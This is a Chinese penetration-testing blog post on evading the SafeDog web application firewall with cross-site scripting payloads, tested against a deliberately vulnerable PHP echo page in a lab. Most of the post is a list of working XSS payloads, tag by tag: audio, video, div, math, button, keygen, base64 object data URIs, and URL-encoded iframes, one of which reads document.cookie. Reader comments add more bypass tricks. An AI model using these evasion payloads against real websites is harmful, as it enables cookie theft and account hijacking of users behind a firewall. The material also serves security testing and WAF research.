首页 » 渗透测试 » 正文

xss绕过安全狗方法

0x00:环境

server 2003+phpstudy+安全狗apache版本v4.0+PHP代码

测试代码:

<?php

//XSS反射型漏洞

//1.变量的直接输出    

echo $_GET['XSS'];

?>

 

0x01:标签

先对标签进行测试。

标签:

<script>  <a>  <p>  <img>  <body> <button>  <var>  <div>  <iframe>  <object> <input> 
<textarea>  <keygen> <frameset>  <embed>  <svg>  <math>  <video>  <audio> <select>

没有过滤的标签:

<a>
<body>        
<button>    
<var>      
<iframe>     
<object>    
<keygen>      
<math>
<svg>

 

 

0x02:绕过方法

可以弹窗的:alert,prompt ,confirm,base64加密,编码绕过(安全狗都没有过滤)

绕过方法有很多比如:

1.大小写绕过

2.javascript伪协议

3.没有分号

4.Flash

5.HTML5 新标签

6.Fuzz进行测试

7.双层标签绕过

 

 

audio标签:

<audio src=x onerror=alert(47)>
<audio src=x onerror=prompt(1);>
<audio src=1 href=1 onerror="javascript:alert(1)"></audio>

 

 

video标签:

<video src=x onerror=prompt(1);>
<video src=x onerror=alert(48)>

 

 

标签:div

<div style="width:expression(alert(/1/))">1</div>     ie浏览器执行
<div onmouseover%3d'alert%26lpar%3b1%26rpar%3b'>DIV<%2fdiv>   url编码绕过

 

 

math标签:

<math><a/xlink:href=javascript:prompt(1)>Xss

<math href="javascript:javascript:alert(1)">Xss</math> 

 

 

button标签:

<button onfocus=alert(1) autofocus>
<button/onclick=alert(1) >xss</button>

 

 

keygen标签:

<keygen/onfocus=prompt(1);>
<keygen onfocus=javascript:alert(1) autofocus>

 

 

object标签:


<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>

base64加密:PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg    
      解码:<script>alert(1)</script>

 

iframe标签:

<IFRAME width%3d"420" height%3d"315" frameborder%3d"0" onload%3d"alert(document.cookie)"><%2fIFRAME>
<iframe%2fsrc%3d"data%3atext%2fhtml%3b%26Tab%3bbase64%26Tab%3b,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg%3d%3d">
<iframe srcdoc%3d'%26lt%3bbody onload%3dprompt%26lpar%3b1%26rpar%3b%26gt%3b'>

 

本文共 3 个回复

  • 此言差异 2019/05/04 15:20

    由于安全狗对/**/里面的东西不做任何检测所以只要把payload放入/**/即可绕过 /*alert(1)*/

  • 猫星人 2019/05/05 10:04

    给博主提个问题,就在博主搭建的环境里面,当waf直接过滤了尖括号,并且对尖括号各种编译情况都过滤了,怎么绕过waf呢?

    • 小雨 博主 2019/05/05 12:38

      @ 猫星人 \\'); alert(\'xss\');var x=\' 可以参考:https://www.cnblogs.com/go2bed/p/4131222.html

发表评论